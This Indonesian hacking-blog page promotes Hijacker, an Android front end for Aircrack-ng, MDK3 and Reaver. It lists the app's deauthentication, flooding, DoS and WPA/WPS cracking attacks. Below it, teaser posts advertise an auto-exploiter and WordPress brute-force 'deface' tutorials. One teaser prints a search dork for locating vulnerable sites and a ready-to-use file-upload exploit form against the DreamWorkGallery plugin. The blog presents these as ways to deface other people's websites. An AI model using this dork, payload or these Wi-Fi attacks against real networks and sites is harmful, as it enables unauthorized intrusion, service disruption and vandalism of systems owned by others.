Skip to main content

Hijacker v1.5 - All-in-One Wi-Fi Cracking Tools untuk Android

squadcyber - Hijacker adalah Antarmuka Pengguna Grafis untuk alat pengujian penetrasi Aircrack-ng, Airodump-ng, MDK3 dan Reaver. Ini menawarkan UI sederhana dan mudah untuk menggunakan alat-alat ini tanpa mengetik perintah di konsol dan menyalin & menyisipkan alamat MAC.
Aplikasi ini membutuhkan perangkat Android ARM dengan adaptor nirkabel internal yang mendukung Mode Monitor. Beberapa perangkat Android melakukannya, tetapi tidak ada yang asli. Ini berarti Anda akan membutuhkan firmware khusus. Setiap perangkat yang menggunakan chipset BCM4339 (MSM8974, seperti Nexus 5, Xperia Z1 / Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) akan bekerja dengan Nexmon (yang juga mendukung beberapa chipset lain). Perangkat yang menggunakan BCM4330 dapat menggunakan bcmon.
Alternatifnya adalah menggunakan adaptor eksternal yang mendukung mode monitor di Android dengan kabel OTG.
Alat yang diperlukan termasuk untuk perangkat armv7l dan aarch64 pada versi 1.1. Driver Nexmon dan utilitas manajemen untuk BCM4339 dan BCM4358 juga disertakan.
Akses root juga diperlukan, karena alat-alat ini membutuhkan root untuk bekerja.



Fitur

Information Gathering 
  • Lihat daftar titik akses dan stasiun (klien) di sekitar Anda (bahkan yang tersembunyi)
  • Lihat aktivitas jaringan tertentu (dengan mengukur beacon dan paket data) dan kliennya
  • Statistik tentang titik akses dan stasiun
  • Lihat pabrikan perangkat (AP atau stasiun) dari basis data OUI
  • Lihat kekuatan sinyal perangkat dan saring yang lebih dekat dengan Anda
  • Menyimpan paket yang diambil dalam file .cap

Attacks 

  • Mengauthentikasi semua klien jaringan (baik menargetkan masing-masing (efektif) atau tanpa target tertentu)
  • Membatalkan autentikasi klien tertentu dari jaringan itu terhubung
  • MDK3 Beacon Flooding dengan opsi khusus dan daftar SSID
  • MDK3 Authentication DoS untuk jaringan tertentu atau ke AP terdekat
  • Tangkap jabat tangan WPA atau kumpulkan IV untuk memecahkan jaringan WEP
  • Reaver WPS cracking (serangan pixie-dust menggunakan netHunter chroot dan adaptor eksternal)

lainnya

  •  Biarkan aplikasi berjalan di latar belakang, secara opsional dengan pemberitahuan
  • Salin perintah atau alamat MAC ke papan klip
  • Termasuk alat yang dibutuhkan, tidak perlu instalasi manual
  • Termasuk driver Nexmon, perpustakaan yang diperlukan dan utilitas manajemen untuk perangkat BCM4339 dan BCM4358
  • Atur perintah untuk mengaktifkan dan menonaktifkan mode monitor secara otomatis
  • Crack .cap file dengan daftar kata kustom
  • Buat tindakan khusus dan jalankan pada titik akses atau klien dengan mudah
  • Urutkan dan filter Akses Poin dan Stasiun dengan banyak parameter
  • Ekspor semua informasi yang dikumpulkan ke file
  • Tambahkan alias tetap ke perangkat (oleh MAC) untuk identifikasi lebih mudah

Screenshots



Installasi

  • Anda menggunakan Android 5+
  • Anda telah di-root (diperlukan SuperSU, jika Anda menginstal CM / LineageOS SuperSU)
  • Anda memiliki firmware untuk mendukung Mode Monitor pada antarmuka nirkabel Anda
Download versi terbaru di sini.
Ketika Anda menjalankan Hijacker untuk pertama kalinya, Anda akan ditanya apakah Anda ingin menginstal firmware nexmon atau pergi ke layar awal. Jika Anda telah menginstal firmware Anda atau menggunakan adaptor eksternal, Anda bisa pergi ke layar awal. Jika tidak, dan jika perangkat Anda didukung, klik 'Instal Nexmon' dan kemudian 'Instal'. Setelah itu Anda akan mendarat di layar awal dan airodump akan mulai. Pastikan Anda telah mengaktifkan WiFi Anda dan itu dalam mode monitor.

Comments

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...